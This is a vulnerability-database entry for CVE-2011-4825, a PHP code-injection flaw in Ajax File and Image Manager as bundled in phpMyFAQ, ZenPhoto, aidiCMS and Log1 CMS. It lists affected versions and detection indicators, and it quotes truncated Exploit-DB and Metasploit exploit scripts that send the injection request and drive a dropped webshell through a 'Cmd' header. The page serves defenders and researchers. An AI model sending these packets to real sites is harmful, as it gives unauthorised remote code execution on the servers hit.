CVE-2011-4825
published 2011-12-15CVE-2011-4825: Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before…
PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
40.91%
98.5th percentile
Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters.
Affected
35 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpletter | ajax_file_and_image_manager | <= 1.0 | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpletter | ajax_file_and_image_manager | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
| phpmyfaq | phpmyfaq | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect POST requests to any path ending in 'ajax_create_folder.php' — this is the universal injection entry point across all affected products (log1 CMS, phpMyFAQ, aidiCMS, ZenPhoto). ↗
- →Detect subsequent GET requests to 'inc/data.php' under any ajaxfilemanager path — this is the webshell execution step after successful injection. ↗
- →Detect the custom 'Cmd' HTTP header in GET requests to data.php — exploit PoCs use this header to pass base64-encoded OS commands to the dropped webshell. ↗
- →Match the regex pattern '/_code_(.*)/s' in HTTP responses from data.php — exploit PoCs use this delimiter to extract command output from the webshell. ↗
- ·The vulnerability is exploitable without authentication in some affected products (e.g., aidiCMS, ZenPhoto), but requires valid admin credentials in phpMyFAQ — authentication state affects detection logic. ↗
- ·The ajaxfilemanager component is embedded at different sub-paths depending on the host CMS (log1 CMS, phpMyFAQ, aidiCMS, ZenPhoto, tinymce) — detection rules must use wildcard path matching rather than fixed paths. ↗
- ·The Metasploit module targets log1 CMS 2.0 with a default TARGETURI of '/log1cms2.0/' — other deployments will use different base paths. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)
exploitdb·2012-06-03
CVE-2011-4825 Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)
Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Log1 CMS writeInfo() PHP Code Injection",
'Description' => %q{
This module exploits the "Ajax File and Image Manager" component that can be
found in log1 CMS. In function.base.php of this component, the 'data' parameter
in writeInfo() allows any malicious user to have direct control of writing data
to file data.php, which results in arbitrary remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Found the bug in ajax
Exploit-DB
Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution
exploitdb·2011-11-24
CVE-2011-4825 Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution
Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution
---
|";
print "\n| Example....: php $argv[0] localhost / |";
print "\n| Example....: php $argv[0] localhost /log1cms/ |";
print "\n+------------------------------------------------------------------------+\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=";
$packet = "POST {$path}admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}admin/libraries/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r
Exploit-DB
PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution
exploitdb·2011-11-05
CVE-2011-4825 PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution
PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution
---
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /phpmyfaq/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "faqusername={$argv[3]}&faqpassword={$argv[4]}";
$packet = "POST {$path}?action=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pmf_auth=foo\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/pmf_auth=([^;]*);/", http_send($host, $packet), $auth)) die("\n[-] Login failed!\n");
$packet = "GET {$path}admin/editor/plugins/ajaxfilemanager/ajax_login.php HTTP/1.0\r\n";
$packet .= "Host: {$
Exploit-DB
aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution
exploitdb·2011-11-05
CVE-2011-4825 aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution
aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution
---
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /aidicms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\naidicms-shell#
Exploit-DB
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
exploitdb·2011-11-05
CVE-2011-4825 ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
---
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /zenphoto/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=";
$packet = "POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n
Exploit-DB
Ajax File and Image Manager 1.0 Final - Remote Code Execution
exploitdb·2011-11-04
CVE-2011-4825 Ajax File and Image Manager 1.0 Final - Remote Code Execution
Ajax File and Image Manager 1.0 Final - Remote Code Execution
---
Ajax File and Image Manager v1.0 Final Remote Code Execution Vulnerability
author...........: Egidio Romano aka EgiX
mail.............: n0b0d13s[at]gmail[dot]com
software link....: http://www.phpletter.com/
[-] Vulnerability explanation:
The vulnerable code is located into /ajaxfilemanager/ajax_create_folder.php:
11. @ob_start();
12. displayArray($_POST);
13. writeInfo(@ob_get_clean());
this script start the output buffering at line 11 and then call the 'displayArray'
function that simply displays the $_POST array content with the print_r() function,
and finally at line 13 is called the 'writeInfo' function using the current buffer
contents as parameter (that is the $_POST array content). Now look at the 'writeInfo'
Metasploit
Log1 CMS writeInfo() PHP Code Injection
metasploit
Log1 CMS writeInfo() PHP Code Injection
Log1 CMS writeInfo() PHP Code Injection
This module exploits the "Ajax File and Image Manager" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution.
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/18075http://www.phpletter.com/en/DOWNLOAD/1/http://www.phpmyfaq.de/advisory_2011-10-25.phphttp://www.securityfocus.com/bid/50523http://www.zenphoto.org/trac/ticket/2005http://www.exploit-db.com/exploits/18075http://www.phpletter.com/en/DOWNLOAD/1/http://www.phpmyfaq.de/advisory_2011-10-25.phphttp://www.securityfocus.com/bid/50523http://www.zenphoto.org/trac/ticket/2005
2011-12-15
Published